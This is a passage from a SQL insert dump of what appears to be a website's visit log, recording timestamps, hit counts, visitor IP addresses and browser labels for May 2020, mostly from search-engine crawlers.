.70.69','chrome'),(504254,1589180408,2,2,0,0,'66.249.70.72','chrome'),(504255,1589180701,1,1,0,0,'92.60.179.117','chrome'),(504256,1589180773,2,2,0,0,'178.154.200.216','other'),(504257,1589180817,3,3,0,0,'66.249.70.70','chrome'),(504258,1589181084,1,1,0,0,'66.249.64.38','chrome'),(504259,1589181640,1,1,0,0,'157.55.39.186','other'),(504260,1589181930,1,1,0,0,'66.249.70.70','chrome'),(504261,1589182533,1,1,0,0,'131.220.6.152','chrome'),(504262,1589182556,1,1,0,0,'40.77.190.15','other'),(504263,1589182606,1,1,0,0,'66.249.64.33','chrome'),(504264,1589182971,1,1,0,0,'178.154.200.220','other'),(504265,1589183388,1,1,0,0,'91.196.178.21','chrome'),(504266,1589183828,2,2,0,0,'157.55.39.217','other'),(504267,1589183924,1,1,0,0,'66.249.70.72','chrome'),(504268,1589183929,1,1,0,0,'66.249.70.70','chrome'),(504269,1589183933,3,3,0,0,'66.249.70.69','chrome'),(504270,1589184127,1,1,0,0,'194.61.24.94','other'),(504271,1589184288,1,1,0,0,'213.180.203.16','other'),(504272,1589184398,1,1,0,0,'8.29.198.27','other'),(504273,1589184693,1,1,0,0,'8.29.198.26','other'),(504274,1589186266,4,4,0,0,'157.55.39.186','other'),(504275,1589186274,2,2,0,0,'207.46.13.183','other'),(504276,1589186294,2,2,0,0,'157.55.39.217','other'),(504277,1589186302,2,2,0,0,'207.46.13.6','other'),(504278,1589186655,1,1,0,0,'178.154.200.222','other'),(504279,1589187365,1,1,0,0,'178.154.200.236','other'),(504280,1589188012,1,1,0,0,'157.55.39.217','other'),(504281,1589188289,1,1,0,0,'178.154.200.222','other'),(504282,1589189056,2,2,0,0,'207.46.13.183','other'),(504283,1589189281,1,1,0,0,'213.180.203.16','other'),(504284,1589190116,1,1,0,0,'178.154.200.222','other'),(504285,1589190815,8,8,0,0,'77.120.98.235','other'),(504286,1589191715,1,1,0,0,'213.180.203.16','other'),(504287,1589192236,1,1,0,0,'18.216.177.235','chrome'),(504288,1589192360,2,2,0,0,'178.154.200.222','other'),(504289,1589192667,1,1,0,0,'93.124.78.229','chrome'),(504290,1589192827,1,1,0,0,'193.239.75.211','chrome'),(504291,1589193238,1,1,0,0,'66.249.70.69','chrome'),(504292,1589193688,1,1,0,0,'157.55.39.217','other'),(504293,1589194200,1,1,0,0,'207.46.13.183','other'),(504294,1589194349,1,1,0,0,'66.249.64.33','chrome'),(504295,1589194472,1,1,0,0,'66.249.70.72','chrome'),(504296,1589194747,2,2,0,0,'157.55.39.217','other'),(504297,1589195123,1,1,0,0,'109.74.154.72','chrome'),(504298,1589195230,1,1,0,0,'8.29.198.26','other'),(504299,1589195511,1,1,0,0,'8.29.198.27','other'),(504300,1589196340,1,1,0,0,'178.154.200.222','other'),(504301,1589196395,1,1,0,0,'157.55.39.217','other'),(504302,1589197495,1,1,0,0,'40.77.190.7','other'),(504303,1589198058,1,0,1,0,'66.249.70.72',''),(504304,1589198168,1,1,0,0,'66.249.70.70','chrome'),(504305,1589198548,1,1,0,0,'157.55.39.217','other'),(504306,1589198645,1,1,0,0,'95.133.238.58','chrome'),(504307,1589198743,1,1,0,0,'178.154.200.196','other'),(504308,1589198826,1,1,0,0,'66.249.70.72','chrome'),(504309,1589198878,1,1,0,0,'95.216.96.243','other'),(504310,1589198897,2,2,0,0,'207.46.13.6','other'),(504311,1589200033,1,1,0,0,'207.46.13.6','other'),(504312,1589200799,2,2,0,0,'178.154.200.222','other'),(504313,1589201526,1,1,0,0,'207.46.13.183','other'),(504314,1589201532,3,3,0,0,'157.55.39.217','other'),(504315,1589201622,3,3,0,0,'207.46.13.6','other'),(504316,1589203257,2,2,0,0,'207.46.13.183','other'),(504317,1589203467,1,1,0,0,'178.154.200.222','other'),(504318,1589203542,1,1,0,0,'213.180.203.17','other'),(504319,1589204010,2,2,0,0,'207.46.13.6','other'),(504320,1589204114,8,8,0,0,'77.120.98.235','other'),(504321,1589204760,1,1,0,0,'66.249.70.69','chrome'),(504322,1589205155,1,1,0,0,'91.196.178.94','firefox'),(504323,1589205358,1,1,0,0,'213.180.203.122','other'),(504324,1589205497,1,1,0,0,'66.249.64.33','chrome'),(504325,1589205509,1,1,0,0,'178.154.200.216','other'),(504326,1589206065,1,1,0,0,'8.29.198.26','other'),(504327,1589206095,1,1,0,0,'93.73.82.160','chrome'),(504328,1589206332,1,1,0,0,'8.29.198.27','other'),(504329,1589206385,1,1,0,0,'157.55.39.217','other'),(504330,1589206860,2,2,0,0,'66.249.70.69','chrome'),(504331,1589207021,2,2,0,0,'66.249.64.33','chrome'),(504332,1589207373,1,1,0,0,'31.13.127.32','other'),(504333,1589207593,2,2,0,0,'66.249.70.70','chrome'),(504334,1589207909,1,1,0,0,'178.154.200.222','other'),(504335,1589207935,1,1,0,0,'157.55.39.217','other'),(504336,1589208666,1,1,0,0,'178.154.200.236','other'),(504337,1589208806,5,5,0,0,'66.249.70.69','chrome'),(504338,1589209352,1,1,0,0,'66.249.70.70','chrome'),(504339,1589209550,2,2,0,0,'66.249.70.72','chrome'),(504340,1589209687,1,1,0,0,'207.46.13.6','other'),(504341,1589209697,1,1,0,0,'178.154.200.220','other'),(504342,1589209789,2,2,0,0,'66.249.70.69','chrome'),(504343,1589210196,1,1,0,0,'178.154.200.222','other'),(504344,1589210200,1,1,0,0,'213.180.203.16','other'),(504345,1589210330,3,3,0,0,'66.249.70.70','chrome'),(504346,1589210381,1,1,0,0,'176.106.242.148','chrome'),(504347,1589210843,2,2,0,0,'207.46.13.6','other'),(504348,1589210861,1,1,0,0,'66.249.64.33','chrome'),(504349,1589211169,3,3,0,0,'66.249.70.69','chrome'),(504350,1589211214,1,1,0,0,'178.154.200.222','other'),(504351,1589211402,3,3,0,0,'66.249.70.70','chrome'),(504352,1589211583,1,1,0,0,'92.223.89.6','firefox'),(504353,1589211953,1,1,0,0,'91.209.11.236','other'),(504354,1589212043,2,2,0,0,'157.55.39.217','other'),(504355,1589212318,1,1,0,0,'207.46.13.6','other'),(504356,1589212407,1,1,0,0,'66.249.70.70','chrome'),(504357,1589213169,1,1,0,0,'157.55.39.217','other'),(504358,1589213236,1,1,0,0,'195.181.166.143','firefox'),(504359,1589213357,3,3,0,0,'18.188.136.39','chrome'),(504360,1589213660,1,1,0,0,'213.180.203.189','other'),(504361,1589213885,2,2,0,0,'66.249.64.36','chrome'),(504362,1589214051,1,1,0,0,'66.249.70.72','chrome'),(504363,1589214466,2,2,0,0,'207.46.13.183','other'),(504364,1589214528,1,1,0,0,'178.154.200.245','other'),(504365,1589214743,1,1,0,0,'66.249.70.69','chrome'),(504366,1589215106,1,1,0,0,'95.67.114.154','other'),(504367,1589215638,1,1,0,0,'66.249.64.33','chrome'),(504368,1589215781,1,1,0,0,'207.46.13.6','other'),(504369,1589215909,1,1,0,0,'66.249.70.72','chrome'),(504370,1589216897,2,2,0,0,'8.29.198.26','other'),(504371,1589216918,1,1,0,0,'66.249.70.69','chrome'),(504372,1589217255,1,1,0,0,'207.46.13.6','other'),(504373,1589217277,1,1,0,0,'66.249.70.70','chrome'),(504374,1589217727,8,8,0,0,'77.120.98.235','other'),(504375,1589218255,2,2,0,0,'66.249.70.72','chrome'),(504376,1589218331,1,1,0,0,'157.55.39.217','other'),(504377,1589218526,1,1,0,0,'66.249.64.36','chrome'),(504378,1589218739,1,1,0,0,'207.46.13.6','other'),(504379,1589218880,1,1,0,0,'66.249.70.69','chrome'),(504380,1589218888,1,1,0,0,'178.154.200.245','other'),(504381,1589219365,1,1,0,0,'66.249.70.70','chrome'),(504382,1589219938,1,1,0,0,'213.180.203.190','other'),(504383,1589220114,1,1,0,0,'66.249.70.72','chrome'),(504384,1589220531,1,1,0,0,'178.154.200.222','chrome'),(504385,1589220581,5,5,0,0,'66.249.70.69','chrome'),(504386,1589220907,1,1,0,0,'91.196.178.141','chrome'),(504387,1589221085,1,1,0,0,'213.180.203.148','other'),(504388,1589221539,1,1,0,0,'66.249.70.72','chrome'),(504389,1589221667,1,1,0,0,'178.154.200.110','other'),(504390,1589221668,1,1,0,0,'178.154.200.176','other'),(504391,1589221670,1,1,0,0,'178.154.200.17','other'),(504392,1589222122,1,1,0,0,'66.249.70.70','chrome'),(504393,1589222126,2,2,0,0,'207.46.13.183','other'),(504394,1589222299,1,1,0,0,'157.55.39.217','other'),(504395,1589222746,1,1,0,0,'66.249.64.33','chrome'),(504396,1589223320,1,1,0,0,'213.180.203.189','other'),(504397,1589223394,1,1,0,0,'93.124.78.229','chrome'),(504398,1589223607,1,1,0,0,'66.249.70.69','chrome'),(504399,1589223722,1,1,0,0,'207.46.13.6','other'),(504400,1589223801,1,1,0,0,'157.55.39.217','other'),(504401,1589224141,1,1,0,0,'66.249.70.72','chrome'),(504402,1589224492,1,1,0,0,'40.77.190.143','other'),(504403,1589224528,1,1,0,0,'66.249.70.69','chrome'),(504404,1589224720,1,1,0,0,'213.180.203.190','other'),(504405,1589224812,1,1,0,0,'157.55.39.217','other'),(504406,1589226462,1,1,0,0,'66.249.70.70','chrome'),(504407,1589227043,3,3,0,0,'66.249.70.69','chrome'),(504408,1589227270,3,3,0,0,'66.249.70.72','chrome'),(504409,1589227627,2,2,0,0,'66.249.70.70','chrome'),(504410,1589227731,1,1,0,0,'8.29.198.25','other'),(504411,1589227977,1,1,0,0,'8.29.198.27','other'),(504412,1589228070,1,1,0,0,'207.46.13.183','other'),(504413,1589228172,2,2,0,0,'66.249.70.72','chrome'),(504414,1589228269,1,1,0,0,'213.180.203.148','other'),(504415,1589228427,1,1,0,0,'66.249.70.69','chrome'),(504416,1589228614,2,2,0,0,'213.180.203.14','other'),(504417,1589228850,1,1,0,0,'213.180.203.17','other'),(504418,1589229037,1,1,0,0,'178.154.200.92','other'),(504419,1589229241,2,2,0,0,'95.213.141.126','opera'),(504420,1589229285,1,1,0,0,'213.180.203.155','other'),(504421,1589229290,1,1,0,0,'178.154.200.75','other'),(504422,1589229797,1,1,0,0,'66.249.64.33','chrome'),(504423,1589229938,1,0,1,0,'66.249.70.70',''),(504424,1589230109,1,1,0,0,'66.249.70.70','chrome'),(504425,1589230141,1,1,0,0,'178.154.200.246','other'),(504426,1589230144,1,1,0,0,'213.180.203.122','other'),(504427,1589230385,2,2,0,0,'213.180.203.189','other'),(504428,1589230388,1,1,0,0,'178.154.200.91','other'),(504429,1589230589,1,1,0,0,'178.154.200.234','other'),(504430,1589231072,1,1,0,0,'207.46.13.6','other'),(504431,1589231108,2,2,0,0,'66.249.70.69','chrome'),(504432,1589231281,1,1,0,0,'66.249.70.72','chrome'),(504433,1589231525,2,2,0,0,'66.249.70.70','chrome'),(504434,1589232006,1,1,0,0,'207.46.13.183','other'),(504435,1589232274,1,1,0,0,'66.249.64.33','chrome'),(504436,1589232421,8,8,0,0,'77.120.98.235','other'),(504437,1589232580,1,1,0,0,'213.180.203.6','other'),(504438,1589232654,1,1,0,0,'66.249.64.38','chrome'),(504439,1589233242,2,2,0,0,'66.249.70.69','chrome'),(504440,1589233341,1,1,0,0,'157.55.39.105','other'),(504441,1589233528,1,1,0,0,'66.249.64.36','chrome'),(504442,1589233636,1,1,0,0,'178.154.200.100','other'),(504443,1589234184,1,1,0,0,'66.249.70.70','chrome'),(504444,1589234448,1,1,0,0,'178.154.200.91','other'),(504445,1589234518,1,1,0,0,'178.154.200.75','other'),(504446,1589235381,1,1,0,0,'66.249.64.38','chrome'),(504447,1589235828,1,1,0,0,'66.249.70.72','chrome'),(504448,1589236354,3,3,0,0,'66.249.70.69','chrome'),(504449,1589236455,1,1,0,0,'178.154.200.206','other'),(504450,1589236654,1,1,0,0,'207.46.13.108','other'),(504451,1589237028,1,1,0,0,'207.46.13.141','other'),(504452,1589237530,1,1,0,0,'66.249.70.70','chrome'),(504453,1589237748,1,1,0,0,'66.249.70.72','chrome'),(504454,1589238039,1,1,0,0,'207.46.13.6','other'),(504455,1589238515,1,1,0,0,'178.154.200.100','other'),(504456,1589238567,1,1,0,0,'8.29.198.26','other'),(504457,1589238799,1,1,0,0,'8.29.198.25','other'),(504458,1589238866,1,1,0,0,'207.46.13.108','other'),(504459,1589239216,1,1,0,0,'66.249.64.33','chrome'),(504460,1589239236,2,2,0,0,'213.180.203.50','other'),(504461,1589239336,1,1,0,0,'178.154.200.97','other'),(504462,1589239796,1,1,0,0,'178.154.200.106','other'),(504463,1589240225,1,1,0,0,'178.154.200.91','other'),(504464,1589240245,1,1,0,0,'213.180.203.140','other'),(504465,1589240533,1,1,0,0,'178.154.200.234','other'),(504466,1589241306,1,1,0,0,'62.205.134.182','other'),(504467,1589241708,2,2,0,0,'66.249.70.72','chrome'),(504468,1589241921,1,1,0,0,'207.46.13.163','other'),(504469,1589242587,1,1,0,0,'40.77.190.241','other'),(504470,1589242677,1,1,0,0,'66.249.70.70','chrome'),(504471,1589243477,2,2,0,0,'207.46.13.26','other'),(504472,1589243727,1,1,0,0,'66.249.70.69','chrome'),(504473,1589244257,1,1,0,0,'213.180.203.6','other'),(504474,1589244294,1,1,0,0,'207.46.13.108','other'),(504475,1589244368,1,1,0,0,'213.180.203.146','other'),(504476,1589244463,1,1,0,0,'207.46.13.26','other'),(504477,1589244688,1,1,0,0,'178.154.200.92','other'),(504478,1589244785,1,1,0,0,'178.154.200.75','other'),(504479,1589244826,1,1,0,0,'207.46.13.163','other'),(504480,1589245189,1,1,0,0,'178.154.200.91','other'),(504481,1589245221,1,1,0,0,'66.249.70.72','chrome'),(504482,1589245226,1,1,0,0,'66.249.70.70','chrome'),(504483,1589245231,2,2,0,0,'66.249.70.69','chrome'),(504484,1589245313,1,1,0,0,'213.180.203.155','other'),(504485,1589246031,1,1,0,0,'207.46.13.108','other'),(504486,1589246121,1,1,0,0,'178.154.200.47','other'),(504487,1589246323,1,1,0,0,'213.180.203.50','other'),(504488,1589246461,1,1,0,0,'178.154.200.234','other'),(504489,1589246580,1,1,0,0,'207.46.13.26','other'),(504490,1589246831,1,1,0,0,'178.154.200.59','other'),(504491,1589246896,1,1,0,0,'66.249.64.36','chrome'),(504492,1589246999,1,1,0,0,'207.46.13.163','other'),(504493,1589247108,1,1,0,0,'178.154.200.206','other'),(504494,1589247111,1,1,0,0,'213.180.203.142','other'),(504495,1589247334,1,1,0,0,'213.180.203.140','other'),(504496,1589247392,1,1,0,0,'178.154.200.222','other'),(504497,1589247394,1,1,0,0,'54.202.168.250','other'),(504498,1589247510,1,1,0,0,'66.249.70.70','chrome'),(504499,1589248041,1,1,0,0,'176.106.242.148','chrome'),(504500,1589248137,1,1,0,0,'213.180.203.6','other'),(504501,1589248574,1,1,0,0,'207.46.13.163','other'),(504502,1589249207,1,1,0,0,'178.154.200.245','other'),(504503,1589249233,1,1,0,0,'66.249.70.72','chrome'),(504504,1589249394,2,2,0,0,'8.29.198.27','other'),(504505,1589249547,8,8,0,0,'77.120.98.235','other'),(504506,1589249548,1,1,0,0,'178.154.200.17','other'),(504507,1589249957,1,1,0,0,'207.46.13.108','other'),(504508,1589249988,1,1,0,0,'213.180.203.155','other'),(504509,1589250253,1,1,0,0,'178.154.200.236','other'),(504510,1589250534,1,1,0,0,'213.180.203.50','other'),(504511,1589252228,1,1,0,0,'207.46.13.163','other'),(504512,1589252295,1,1,0,0,'207.46.13.26','other'),(504513,1589252856,1,1,0,0,'213.180.203.155','other'),(504514,1589253411,1,1,0,0,'178.154.200.206','other'),(504515,1589253578,1,1,0,0,'207.46.13.219','other'),(504516,1589253736,1,1,0,0,'91.209.11.236','other'),(504517,1589253973,1,1,0,0,'3.90.42.159','chrome'),(504518,1589254093,1,1,0,0,'66.249.64.36','chrome'),(504519,1589254911,1,1,0,0,'213.180.203.140','other'),(504520,1589254941,1,1,0,0,'66.249.64.38','chrome'),(504521,1589255041,1,1,0,0,'213.180.203.190','other'),(504522,1589255274,1,1,0,0,'178.154.200.47','other'),(504523,1589255711,1,1,0,0,'66.249.70.69','chrome'),(504524,1589255786,1,1,0,0,'213.180.203.6','other'),(504525,1589256427,1,1,0,0,'178.154.200.236','other'),(504526,1589256642,1,1,0,0,'178.154.200.92','other'),(504527,1589257225,2,2,0,0,'66.249.70.70','chrome'),(504528,1589257691,1,1,0,0,'178.154.200.91','other'),(504529,1589257761,1,1,0,0,'66.249.70.72','chrome'),(504530,1589257844,2,1,1,0,'66.249.70.69',''),(504531,1589258739,1,1,0,0,'213.180.203.81','other'),(504532,1589258906,1,1,0,0,'62.205.134.182','other'),(504533,1589259444,2,2,0,0,'66.249.70.70','chrome'),(504534,1589259556,1,1,0,0,'66.249.70.72','chrome'),(504535,1589259634,1,1,0,0,'66.249.70.69','chrome'),(504536,1589259864,1,1,0,0,'213.180.203.6','other'),(504537,1589259868,1,1,0,0,'178.154.200.185','other'),(504538,1589259899,2,2,0,0,'207.46.13.219','other'),(504539,1589260090,1,1,0,0,'176.37.125.82','chrome'),(504540,1589260122,1,1,0,0,'213.180.203.65','other'),(504541,1589260222,2,2,0,0,'8.29.198.25','other'),(504542,1589260737,1,1,0,0,'178.154.200.97','other'),(504543,1589260749,8,8,0,0,'77.120.98.235','other'),(504544,1589261082,3,3,0,0,'207.46.13.219','other'),(504545,1589261190,1,1,0,0,'66.249.70.69','chrome'),(504546,1589261195,1,1,0,0,'66.249.70.70','chrome'),(504547,1589261407,1,1,0,0,'178.154.200.246','other'),(504548,1589261426,1,1,0,0,'178.154.200.75','other'),(504549,1589261860,1,1,0,0,'91.196.178.169','chrome'),(504550,1589261879,1,1,0,0,'91.196.178.93','chrome'),(504551,1589262521,3,3,0,0,'66.249.70.70','chrome'),(504552,1589262544,1,1,0,0,'66.249.64.33','chrome'),(504553,1589262688,1,1,0,0,'213.180.203.140','other'),(504554,1589263014,1,1,0,0,'213.180.203.148','other'),(504555,1589263081,1,1,0,0,'213.180.203.189','other'),(504556,1589263101,1,1,0,0,'178.154.200.91','other'),(504557,1589263162,1,1,0,0,'66.249.70.69','chrome'),(504558,1589263183,1,1,0,0,'66.249.64.36','chrome'),(504559,1589264227,1,1,0,0,'178.154.200.97','other'),(504560,1589264229,2,2,0,0,'66.249.70.69','chrome'),(504561,1589264260,2,2,0,0,'66.249.70.70','chrome'),(504562,1589264269,1,1,0,0,'109.184.174.61','chrome'),(504563,1589265205,1,1,0,0,'194.61.24.94','other'),(504564,1589265223,3,3,0,0,'66.249.70.69','chrome'),(504565,1589265228,2,2,0,0,'66.249.70.70','chrome'),(504566,1589265437,3,3,0,0,'178.154.200.12','other'),(504567,1589265504,1,1,0,0,'178.154.200.22','other'),(504568,1589265586,8,8,0,0,'77.120.98.235','other'),(504569,1589266368,2,2,0,0,'66.249.70.69','chrome'),(504570,1589266539,1,1,0,0,'40.77.189.242','other'),(504571,1589266703,1,1,0,0,'178.154.200.114','other'),(504572,1589266772,1,1,0,0,'178.154.200.47','other'),(504573,1589266945,1,1,0,0,'66.249.70.72','chrome'),(504574,1589267018,1,1,0,0,'209.17.97.106','other'),(504575,1589267679,1,1,0,0,'188.163.74.113','chrome'),(504576,1589267696,1,1,0,0,'178.154.200.131','other'),(504577,1589268132,1,1,0,0,'66.249.70.70','chrome'),(504578,1589268287,1,1,0,0,'91.196.177.46','chrome'),(504579,1589268871,1,1,0,0,'66.249.64.38','chrome'),(504580,1589268978,1,1,0,0,'131.220.6.152','chrome'),(504581,1589269058,1,1,0,0,'213.180.203.81','other'),(504582,1589269059,43,43,0,0,'204.12.197.234','other'),(504583,1589269846,1,1,0,0,'178.154.200.245','other'),(504584,1589269985,1,1,0,0,'178.154.200.222','other'),(504585,1589270263,1,1,0,0,'213.180.203.50','other'),(504586,1589270446,1,1,0,0,'91.196.178.94','chrome'),(504587,1589270546,8,8,0,0,'78.46.63.108','other'),(504588,1589270560,1,1,0,0,'13.66.139.0','other'),(504589,1589270644,1,1,0,0,'207.46.13.219','other'),(504590,1589271052,1,1,0,0,'8.29.198.26','other'),(504591,1589271249,1,1,0,0,'66.249.70.72','chrome'),(504592,1589271252,8,8,0,0,'77.120.98.235','other'),(504593,1589271271,2,2,0,0,'66.249.70.69','chrome'),(504594,1589271273,1,1,0,0,'8.29.198.25','other'),(504595,1589271426,2,2,0,0,'66.249.70.70','chrome'),(504596,1589271667,1,1,0,0,'195.10.210.98','chrome'),(504597,1589272084,1,1,0,0,'213.180.203.146','other'),(504598,1589272244,1,1,0,0,'213.180.203.17','other'),(504599,1589272362,1,1,0,0,'213.180.203.189','other'),(504600,1589272798,1,1,0,0,'213.180.203.155','other'),(504601,1589272883,1,1,0,0,'207.46.13.219','other'),(504602,1589273172,1,1,0,0,'91.196.178.173','chrome'),(504603,1589273263,1,1,0,0,'66.249.64.36','chrome'),(504604,1589273854,1,1,0,0,'178.154.200.110','other'),(504605,1589274257,1,1,0,0,'178.154.200.119','other'),(504606,1589274371,3,3,0,0,'66.249.70.70','chrome'),(504607,1589274449,1,1,0,0,'66.249.70.72','chrome'),(504608,1589275776,1,1,0,0,'66.249.70.69','chrome'),(504609,1589276060,1,1,0,0,'213.180.203.50','other'),(504610,1589276129,1,1,0,0,'207.46.13.219','other'),(504611,1589276312,3,3,0,0,'66.249.70.70','chrome'),(504612,1589276627,8,8,0,0,'77.120.98.235','other'),(504613,1589276769,1,1,0,0,'91.196.178.21','chrome'),(504614,1589277182,1,1,0,0,'207.46.13.219','other'),(504615,1589277260,2,2,0,0,'66.249.70.70','chrome'),(504616,1589277274,1,1,0,0,'178.154.200.119','other'),(504617,1589277281,2,2,0,0,'193.169.80.252','chrome'),(504618,1589277446,1,1,0,0,'213.180.203.140','other'),(504619,1589277484,1,1,0,0,'213.180.203.38','other'),(504620,1589277658,1,1,0,0,'91.209.11.236','other'),(504621,1589277696,1,1,0,0,'66.249.70.72','chrome'),(504622,1589277982,1,1,0,0,'66.249.70.69','chrome'),(504623,1589278257,2,2,0,0,'207.46.13.219','other'),(504624,1589278945,1,1,0,0,'66.249.70.69','chrome'),(504625,1589279066,1,1,0,0,'178.154.200.246','other'),(504626,1589279251,1,1,0,0,'34.232.105.68','chrome'),(504627,1589279307,1,1,0,0,'91.244.16.115','chrome'),(504628,1589279570,1,1,0,0,'66.249.64.36','chrome'),(504629,1589279611,3,3,0,0,'66.249.70.72','chrome'),(504630,1589280153,1,1,0,0,'178.154.200.246','other'),(504631,1589280214,1,1,0,0,'213.180.203.81','other'),(504632,1589280735,1,1,0,0,'66.249.64.36','chrome'),(504633,1589280798,3,3,0,0,'66.249.70.70','chrome'),(504634,1589281322,2,2,0,0,'31.13.127.7','other'),(504635,1589281324,1,1,0,0,'31.13.127.11','other'),(504637,1589281339,1,1,0,0,'109.74.154.72','chrome'),(504638,1589281381,1,1,0,0,'91.196.177.147','chrome'),(504639,1589281833,1,1,0,0,'66.249.70.70','chrome'),(504640,1589281839,8,8,0,0,'77.120.98.235','other'),(504641,1589281878,2,2,0,0,'8.29.198.27','other'),(504642,1589281921,1,1,0,0,'207.46.13.209','other'),(504643,1589282762,1,1,0,0,'173.252.127.5','other'),(504644,1589282763,1,1,0,0,'173.252.127.10','other'),(504645,1589283300,3,3,0,0,'66.249.70.69','chrome'),(504646,1589284172,8,8,0,0,'77.120.98.235','other'),(504647,1589284187,1,1,0,0,'207.46.13.209','other'),(504648,1589284591,1,1,0,0,'66.249.70.72','chrome'),(504649,1589284685,1,1,0,0,'188.191.103.32','chrome'),(504650,1589285564,2,2,0,0,'66.249.70.69','chrome'),(504651,1589285569,1,1,0,0,'66.249.70.70','chrome'),(504652,1589285685,2,2,0,0,'207.46.13.209','other'),(504653,1589285780,5,5,0,0,'207.46.13.219','other'),(504654,1589286287,8,8,0,0,'77.120.98.235','other'),(504655,1589286856,1,1,0,0,'207.46.13.209','other'),(504656,1589287365,1,1,0,0,'91.196.178.173','chrome'),(504657,1589287379,2,2,0,0,'66.249.70.70','chrome'),(504658,1589287801,2,2,0,0,'66.249.70.72','chrome'),(504659,1589287931,2,2,0,0,'66.249.70.69','chrome'),(504660,1589288344,8,8,0,0,'77.120.98.235','other'),(504661,1589288526,1,1,0,0,'91.121.109.55','other'),(504662,1589289441,1,1,0,0,'66.249.70.69','chrome'),(504663,1589289465,1,1,0,0,'207.46.13.209','other'),(504664,1589289601,1,1,0,0,'91.121.109.55','other'),(504665,1589289617,3,3,0,0,'66.249.70.72','chrome'),(504666,1589290394,2,2,0,0,'207.46.13.209','other'),(504667,1589290507,2,2,0,0,'66.249.70.70','chrome'),(504668,1589290606,8,8,0,0,'77.120.98.235','other'),(504669,1589290616,2,2,0,0,'66.249.70.72','chrome'),(504670,1589292709,1,1,0,0,'8.29.198.25','other'),(504671,1589292852,1,1,0,0,'31.13.127.111','other'),(504672,1589292853,1,1,0,0,'31.13.127.23','other'),(504673,1589292854,2,2,0,0,'31.13.127.4','other'),(504676,1589292885,1,1,0,0,'31.13.127.112','other'),(504677,1589292886,1,1,0,0,'31.13.127.11','other'),(504680,1589292916,1,1,0,0,'31.13.127.8','other'),(504681,1589292933,8,8,0,0,'77.120.98.235','other'),(504682,1589292938,1,1,0,0,'8.29.198.27','other'),(504683,1589292974,2,2,0,0,'66.249.70.72','chrome'),(504684,1589293436,1,1,0,0,'95.132.58.111','chrome'),(504685,1589293625,1,1,0,0,'31.13.127.14','other'),(504687,1589293646,2,2,0,0,'31.13.127.119','other'),(504688,1589293713,1,1,0,0,'66.249.64.38','chrome'),(504689,1589293724,1,1,0,0,'91.209.11.236','other'),(504690,1589293786,1,1,0,0,'34.254.60.215','chrome'),(504691,1589293923,2,2,0,0,'91.196.178.181','chrome'),(504692,1589293925,2,2,0,0,'66.249.88.232','chrome'),(504693,1589293933,1,1,0,0,'66.249.88.228','chrome'),(504694,1589293935,1,1,0,0,'66.249.88.230','chrome'),(504695,1589293934,1,1,0,0,'66.249.88.230','chrome'),(504697,1589294181,4,4,0,0,'66.249.88.136','chrome'),(504698,1589294192,1,1,0,0,'66.249.88.135','chrome'),(504700,1589294193,8,8,0,0,'66.249.88.131','chrome'),(504701,1589294328,1,1,0,0,'178.154.200.220','other'),(504702,1589294883,1,1,0,0,'66.249.70.70','chrome'),(504703,1589295219,8,8,0,0,'77.120.98.235','other'),(504704,1589295486,1,1,0,0,'66.249.70.69','chrome'),(504705,1589295497,1,1,0,0,'91.196.178.181','chrome'),(504706,1589296221,1,1,0,0,'66.249.64.38','chrome'),(504707,1589296274,1,1,0,0,'207.46.13.219','other'),(504708,1589296637,1,1,0,0,'91.196.178.88','firefox'),(504709,1589297048,1,1,0,0,'64.44.48.49','chrome'),(504710,1589297065,1,1,0,0,'45.131.248.93','chrome'),(504711,1589297371,8,8,0,0,'77.120.98.235','other'),(504712,1589297589,2,2,0,0,'66.249.70.70','chrome'),(504713,1589297642,1,1,0,0,'91.209.11.236','other'),(504714,1589297693,1,1,0,0,'66.249.70.72','chrome'),(504715,1589299052,1,1,0,0,'188.163.74.113','chrome'),(504716,1589299476,8,8,0,0,'77.120.98.235','other'),(504717,1589299504,2,2,0,0,'66.249.70.72','chrome'),(504718,1589299790,1,1,0,0,'66.249.64.33','chrome'),(504719,1589299847,1,1,0,0,'207.46.13.219','other'),(504720,1589300337,1,1,0,0,'66.249.70.70','chrome'),(504721,1589300834,1,1,0,0,'91.196.178.73','chrome'),(504722,1589300862,2,2,0,0,'66.249.70.72','chrome'),(504723,1589300935,1,1,0,0,'66.249.70.69','chrome'),(504724,1589301351,1,1,0,0,'178.154.200.220','other'),(504725,1589301388,3,3,0,0,'66.249.70.70','chrome'),(504726,1589301563,1,1,0,0,'207.46.13.219','other'),(504727,1589301570,1,1,0,0,'66.249.64.33','chrome'),(504728,1589302018,1,1,0,0,'91.196.178.47','chrome'),(504729,1589302460,8,8,0,0,'77.120.98.235','other'),(504730,1589303244,1,1,0,0,'178.154.200.92','other'),(504731,1589303366,1,1,0,0,'66.249.70.70','chrome'),(504732,1589303373,8,8,0,0,'77.120.98.235','other'),(504733,1589303383,1,1,0,0,'46.98.201.46','chrome'),(504734,1589303538,1,1,0,0,'8.29.198.27','other'),(504735,1589303563,1,1,0,0,'66.249.64.38','chrome'),(504736,1589303774,1,1,0,0,'8.29.198.26','other'),(504737,1589303791,1,1,0,0,'91.196.178.36','chrome'),(504738,1589304256,1,1,0,0,'207.46.13.219','other'),(504739,1589304324,1,1,0,0,'207.46.13.209','other'),(504740,1589304389,2,2,0,0,'66.249.70.72','chrome'),(504741,1589304458,1,1,0,0,'66.249.64.33','chrome'),(504742,1589304635,8,8,0,0,'77.120.98.235','other'),(504743,1589304729,1,1,0,0,'66.249.64.36','chrome'),(504744,1589305072,1,1,0,0,'66.249.70.69','chrome'),(504745,1589305192,1,1,0,0,'66.249.70.70','chrome'),(504746,1589305243,2,2,0,0,'178.154.200.222','other'),(504747,1589306383,2,2,0,0,'66.249.70.72','chrome'),(504748,1589306612,2,2,0,0,'66.249.70.70','chrome'),(504749,1589306722,2,2,0,0,'66.249.70.69','chrome'),(504750,1589306754,8,8,0,0,'77.120.98.235','other'),(504751,1589306960,1,0,1,0,'54.38.123.240',''),(504752,1589307848,2,2,0,0,'66.249.70.70','chrome'),(504753,1589308106,1,1,0,0,'66.249.70.69','chrome'),(504754,1589308506,1,1,0,0,'46.211.56.121','chrome'),(504755,1589308753,1,1,0,0,'88.155.153.25','chrome'),(504756,1589308818,1,1,0,0,'66.249.70.72','chrome'),(504757,1589308870,8,8,0,0,'77.120.98.235','other'),(504758,1589309134,1,1,0,0,'178.154.200.222','other'),(504759,1589309135,1,1,0,0,'213.180.203.16','other'),(504760,1589310380,1,1,0,0,'66.249.70.72','chrome'),(504761,1589310819,8,8,0,0,'77.120.98.235','other'),(504762,1589310979,2,2,0,0,'207.46.13.219','other'),(504763,1589311008,1,1,0,0,'66.249.70.70','chrome'),(504764,158931136